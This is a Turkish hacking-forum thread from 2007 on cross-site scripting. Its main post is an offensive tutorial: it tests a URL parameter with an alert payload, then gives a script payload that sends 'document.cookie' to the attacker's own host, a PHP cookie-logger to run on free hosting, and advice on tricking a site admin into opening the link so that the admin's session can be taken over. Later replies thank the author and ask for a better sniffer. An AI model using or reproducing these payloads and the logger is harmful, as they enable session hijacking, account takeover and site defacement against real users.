ForumTayfa  

Go Back   ForumTayfa > Güvenlik & Bilgisayar & İnternet & Webmaster & Programlama Bölümü > Güvenlik & Bilgisayar & İnternet & Webmaster & Programlama > Güvenlik ve Güvenlik Açıkları

Güvenlik ve Güvenlik Açıkları Pc güvenliği ile ilgili tüm konuların tartışıldığı bölüm...

Yeni Konu aç  Cevapla
 
LinkBack Seçenekler Stil
Alt 18.07.07, 23:57   #1 (permalink)
Yeni Tayfa
 
Kızıl_Elma - ait Kullanıcı Resmi (Avatar)
 
Üyelik Tarihi: Jun 2007
Mesaj Sayısı: 96
Konu Sayısı: 56
Takım: Galatasaray
Rep Gücü: 278
Rep Puanı: 26414
Rep Derecesi : Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000Kızıl_Elma 0-250000
Ruh Hali:

Exclamation profesyonel değilseniz XSS"le uğraşmayın




Arkadaslar aylardır herkes yeni xss açığını arıyor, bazılarında ümit kalmadı,ve gerçek'ten xss unuttun çünkü xss denilen bi sey var ama çok zor ,
neden mi ? :
çünkü hemen hemen bütün hackerler xss açıkların microsofta sikayet ediyor.
peki niye sikayet ediyorlar ?
çünkü microsoft onlara para veriyor

Onlara hak veriyorum çünkü sabaha kadar aptalca herkesi hacklemek'tense akıllıca para kazanma yöntemlerine bakıyorlar

çok fazla hacker xss açıklarını arıyor ekmek parasi için


__________________
PAİN!!!
Kızıl_Elma isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 03.09.07, 15:52   #2 (permalink)
Yeni Tayfa
 
saldirg@n - ait Kullanıcı Resmi (Avatar)
 
Üyelik Tarihi: Sep 2007
Mesaj Sayısı: 11
Konu Sayısı: 2
Rep Gücü: 0
Rep Puanı: 5519
Rep Derecesi : saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000saldirg@n 0-250000
Ruh Hali:

Cevap: profesyonel değilseniz XSS"le uğraşmayın




Selam Arkadaşlar Bu sitedeki ilk msjım bu konuya nasip oldu Arkadaşında dedigi gibi bilmek gerekli Ve bende dilim döndügünce anlatmaya çalışacagım yanlışım olursa düzeltin lütfen

Cross Site Scripting

Adında Belli oldugu gibi Scriptlerle Oynama Olayıdır. Saldirgan kişi yada kişilerin Scriptlerle Oynanılarak Yapılan Bir Hack Çeşitidir. Saldırgan, Sitede Bulunan Herhangi Bir Yere Bir Script Kodu (Java,Html Vs...) Ekleyerek, Kullanıcılara Ait Bilgileri Çalmayı Hedefleyen Bir Saldırı Çeşitidir.


xss Açığı Nasıl Bulunur ?

Nasıl Bulunduğuna Başlamadan Önce Hem Mail xss Hemde Web Deface İçin xss Bir Sitenin Her Yerinde Olabilir Örneğin Üyelik Sisteminin Olduğu Kısımlar Vs... ( Unutmayınki Heryerinde Olabilir ) Kısacası Script Parametrelerinin Olduğu Her Yerde xss Açığı Olabilir...Bunun İçin Programlarda Mevcuttur Ama Benim Görüşüm En İyisi Manuel ( Eller ) Olarak Yapmaktır

xss'nin Ana Mantığı Site Üzerinde Javascript Kodlarını Çalmaktır... Bilindiği Üzere Web Deface İçinde Süper Bir Yöntemdir... Arkadaşın aksine ben halen daha kullanılacagını düşünüyorum

Örneğin Web Site Üzerinde Deniyeceğiz Javascript Codlarıyla Admin Cookisi Çalabilir Onun Kimliği İle Siteye Giriş Yapabilir Dilediğinizi Yapabilirsiniz... Şimdi Bir Çoğunuzun AKlına Cookie Nedir Diye Aklınıza Gelmiyor Değildir Hani El Atmışkan Bu Konuya Cookie Olayınada Değinelim.Cookie Nedir Onuda Öğretelim...

Öncelikle Cookie Nedir Ne İşe Yarar ?

Cookie Kelimesi "Web Sayfası Sunucusunun Sizin Bilgisayarınızın Hard Diskine Yerleştirdiği Ufak Bir Text Dosyası" için Kullanılmaktadır. Yani, o Web Sitesinin Sizin Bir Sonraki Ziyarette Sizi Tanıması İçin Geçerli Bir Bilgidir. Bu Text Dosyası Bir komut Dosyası Olmadığı Gibi, Virüs de Değildir. Size Özel Bir Tanımlamadır Ve Sadece Bu Kodu Tanımlayan Web Sunucusu Tarafından Okunabilir.

Cookie'nin Amacı; Sizin o Siteyi Yeniden Ziyaret Ettiğinizi Web Sunucuya Bildirmekten İbarettir.

Ne İşe Yarar ; Sizi Zaman Kaybından Korur Kendinize Kişselleştirdiğiniz Bir Sayfanız Varsa Bu Cookiler Sizi Hatırlar.Bir Web Sayfasına Bir Sonraki Dönüşünüzde İstediğiniz Bilgiler Ekrana Gelir ( Şifrenisin Otomatik Hatırlanması Gibi )

Evet Cooki'yide Açıkladığımıza Göre Şimdi Kaldığımız Yerden Devam Edebiliriz...


xss Açığını Bulmaya Geldi Sıra :


Şimdi Hedeflediğimiz Sistemde İyice Bir Göz Gezdirelim Ayrıntılarını Gözden Kaçırmıyalım { Bunların Hepsi Tabi Url ( Adres ) Kısmında Olucaktır }
Site Url ( Adres ) Kısmında = Bu Parametreyi Gördünüz Her Yeri Yanınızamı Not ALırsınız Yoksa İyi Bir Ezbercimisiniz Orası Size Kalmış Çünkü Biraz Sonra = Bu Paremetreyi Gördüğünüz Yerler Sizlere Lazım Olucak...

Hedeflediğimiz Sistem Örneğin Şu Olsun [Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...]

= Parametresinin Sonuna Javascript Kodlarımızı Deneyip Cookie Hatası Verdirebilmektir.


[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...] Burda 10 Kısmından Sonra

Www.Example.Com/xxx.Php?id=10"><Script>Alert([email protected])</Script> Bu Kodu Yazıp Enter Diyip Devam Deniyorsunuz Evet Karşınıza Değişik Bir Şeyler Çıktı

Üzerinde [email protected] Yazan Bir Sesli Uyarı Çıktı... Bu Uyarıyı Aldığınız An Sitede xss Açığını Yakalamayı Başardınız Demektir. Olay Bu Kadarla Sınırlı Değil Bu Olay Mailler İçinde Geçerli

[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...] /Xxxx.Aspx?id=1879 Böle Bir Url Var Karşınızda Diyelim ( Arkadaşlar Bu Url'lerin Hepsini Kafamdan Uydurdum Bunlar Üzerinde Deneme Yapmayın ) Evet Hedeflediğimiz Web Sistemine Yaptığımızın Aynısını Mail Sitemine De Yapıyoruz Aynı Hatayı Aldığınız An Bilinki Mail xss Yakalamış Oldunuz...


Arkadaşlar Mail xss Yakalamış Olduğunuz Yer İçin ( Sadece Mail İçin Geçerli Değil Bu Yapacağımız İşlemler Hedeflediğimiz Web Sistemimiz İçinde Geçerli )


xss Yi Yakalamış Olduğumuz Sistemler İçin Yapılması Gerekenler :

1) Bulduğumuz Açığa Cookie Sömürücü Kodu Ekliyoruz

2) Cookilerin Bizim ELimize Ulaşması İçin Cookie Sniffer Hazırlıyoruz

3) En Son İşlemimizde Hedefe Yedirtmek Kalıyor Orasıda Size Kalmı


*** Şimdi Burayı İyi Okuyun

Açığı Bulduğumuz Url : [Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...] Buraya Sömürücü Kodumuzu Ekliyoruz

Sömürücü Kodumuz : "><Script>Windows.Location="Http://Www.Sizinadres.Com/Cookie.Php?Cookie="+Document.Cookie;</Script> ( [Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...] Yerine Kendi Sisteminizin Adını Geçirin )

Yedirilecek Kod : Www.Example.Com/xxx.Php?id=10"><Script>Windows.Location="Http://Www.Sizinadres.Com/Cookie.Php?Cookie="+Document.Cookie;</Script> Evet Bunu Admine Yedirmek Artık Sizin Kabiliyetinize Kalmış Bir Şey...

[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...] Arkadaşlar Buraya Cookieler Gelicektir...
Burasıda Gelecek Cookilerin Yazılmasını Sağlayan Ve Bir Host İçine Attığınız Sniffer Dosyasıdır...[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...] Sistem Adresiniz.Com/Cookie.Php

2) İşleme Geçiyoruz...

Bunlar Tamamsa Şimdi Sizlere Sniffer Hazırlıyalım ; Benim Kullandığım Kodları Aynen Geçiyorum Buraya
<?Php
/"[email protected] Cookie Çalma Olayı */
/Bu Kodu Kendi Sisteminiz Varsa Oraya Yoksa Free Hosta Atın*/
$Cookie=$_Get['Cookie'];
$Log=Fopen("CookiesP.Txt","a");
Fwrite($Log,$Cookie."\\n");
Fclose($log);
?>


Şimdi Yukarıdaki Bir Notepad'e Yazıp Cookie.Php Olarak Kayıt Edin...Ardından Boş Bir Sayfa Daha Açıp Onada CookiesP.Txt Adını Veriyoruz Ve Bunları İster Kendi Sisteminize İstersenizde Free Bir Hosta Atın Size Kalmış Artık Orası

***** Not : Bu İki Klasöründe Yazma İzni Olması Lazım ( Chmod 777 ) Bunu Da Attığınız Zaman Hostunuza İster Programla Bağlanıp Yapın Chmod Ayarını İstersenizde Ftp Adresinize Girerek



3) En Zor Ve En Eğlenceli Kısım Karşıya Yedirmek Kalıyor Orasıda Size Kalsın Ama Basit Bir Örnek Vereyim İster Site Admininin Güvenini Kazanın İstersenizde Bulun Bir Oyun





Bu Döküman Tamamen Benim Tarafımdan Yazılmıştır Bunu BARIŞ ARKADAŞIMA Bir vefa borcu olarakta algılaya bilirsiniz Sagda solda yayınlamak yasak degil yayınlanmassa sevınırım




Forumta da Stenly

ıq da gölge

Forumtayfada [email protected]


Saygılarımla.....


__________________
!!! SABIR SELAMETİMSE İNTİKAM FELAKETİMDİR !!!
saldirg@n isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 03.09.07, 15:55   #3 (permalink)
Administrator
 
ApocalypsE - ait Kullanıcı Resmi (Avatar)
 
Üyelik Tarihi: Dec 2006
Nereden: İstanbul
İlişki Durumu: Evli
Mesaj Sayısı: 11.805
Konu Sayısı: 1212
Takım: Galatasaray
Rep Gücü: 4000000
Rep Puanı: 108306858
Rep Derecesi : ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000ApocalypsE 0-10000000
Ruh Hali:

Üyenin Facebook Profilini Ziyaret Et Üyenin Twitter Profilini Ziyaret Et
Standart Cevap: profesyonel değilseniz XSS"le uğraşmayın




Tşkler bu yararlı güzel bilgiler için..

Bu arada hoşgeldin..


__________________
MusAElif
ApocalypsE isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 11.09.07, 15:15   #4 (permalink)
Yeni Tayfa
 
*stenly* - ait Kullanıcı Resmi (Avatar)
 
Üyelik Tarihi: Sep 2007
Nereden: Alayındannn!!! Takım:Be$ikta$ Slogan:KaRTaL goL goL goL Nüfus:32.145
Mesaj Sayısı: 208
Konu Sayısı: 21
Takım: Beşiktaş
Rep Gücü: 490
Rep Puanı: 47717
Rep Derecesi : *stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000*stenly* 0-250000
Ruh Hali:

Standart Cevap: profesyonel değilseniz XSS"le uğraşmayın




abi saldirgan abim süpersin ya yine farkını her tarafda gösteriyosun Ömer abiye slm damara dwm


__________________
*STENLY* KİMDİR MERAK ETTİYSEN?
[Sadece Kayıtlı Kullanıcılar Linkleri Görebilir.Kayıt Olmak İçin Tıklayınız...]

+++++++REP+++++++


////***Hayattan nefret etmeye basladım***\\\\
*Stenly*
*stenly* isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 08.02.08, 19:00   #5 (permalink)
Yeni Tayfa
 
fLeX - ait Kullanıcı Resmi (Avatar)
 
Üyelik Tarihi: Dec 2007
Mesaj Sayısı: 2
Konu Sayısı: 1
Rep Gücü: 0
Rep Puanı: 10
Rep Derecesi : fLeX 0-250000
Standart Cevap: profesyonel değilseniz XSS"le uğraşmayın




[email protected], öncelikle anlattıkların için teşekkürler fakat elinde daha güzel bir Sniffer ve anlatımı varsa veya sen anlatırmısın lütfen...

Teşekkürler...


fLeX isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla


Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık



Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 02:19.


Powered by vBulletin® Version 3.8.0
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.
Search Engine Optimization by vBSEO 3.6.0
User Alert System provided by Advanced User Tagging v3.0.6 (Lite) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
ForumTayfa

Arşiv: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 16 22 23 24 25 26 27 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 95 96 97 98 99 100 102 103 104 105 106 155 156 157 158 159 160 161 162 163 164 167 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271


ForumTayfa - Link Değişimi
Telinka İletişim | Voip Ürünleri | Link Değişimine Katılın |

Sitemiz bir forum sitesi olduğundan dolayı, kullanıcılar her türlü görüşlerini önceden onay olmadan anında siteye yazabilmektedir. ForumTayfa Yöneticileri mesajları itina ile kontrol etse de, bu yazılardan dolayı doğabilecek her türlü sorumluluk yazan kullanıcılara aittir. Yine de sitemizde yasalara aykırı unsurlar bulursanız [email protected] email adresine bildirebilirsiniz, şikayetiniz incelendikten sonra en kısa sürede gereken yapılacaktır.

Any member of our web site has the right of adding comments instantly without getting permisson due to the forum structure of our site basis. Althought, our site modarators check comments with care, all the responsibilities sourced from these comments directly belong to the members. If you still find any illegal content in our site ( A.buse, H.arassment, S.camming, H.acking, W.arez, C.rack, D.ivx, Mp.3 or any Illegal Activity ), please report us via [email protected] .Your reports will be evaluated as soon as the arrival of your e-mail.